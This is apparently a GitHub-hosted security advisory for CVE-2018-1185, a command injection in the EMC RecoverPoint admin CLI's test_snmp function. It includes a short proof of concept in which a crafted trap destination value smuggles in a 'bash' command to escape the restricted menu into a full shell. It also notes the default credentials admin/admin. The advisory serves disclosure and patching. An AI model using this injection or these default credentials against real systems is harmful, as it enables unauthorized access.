Skip to content

Latest commit

 

History

History
32 lines (24 loc) · 1.15 KB

EMC_RPT_CVE-2018-1185.md

File metadata and controls

32 lines (24 loc) · 1.15 KB

EMC RecoverPoint Admin CLI Command Injection test_snmp

1. Description

An OS command injection vulnerability resulting in code execution as the built-in admin user (default credentials admin/admin).

A crafted entry can result in the ability to escape from the restricted admin user's menu driven CLI to a full Linux operating system shell in the context of the admin user. The attack vector is the trap destination (hostname/IP) parameter of the test_snmp function.

2. Proof of Concept

RecoverPoint> test_snmp
Enter the trap destination (host name or IP)
 > /dev/null 2>&1 ; bash #
admin@RecoverPoint:/home/kos/cli$ exit
exit
Test completed successfully.
RecoverPoint> 

3. Solution:

Update to latest version of RecoverPoint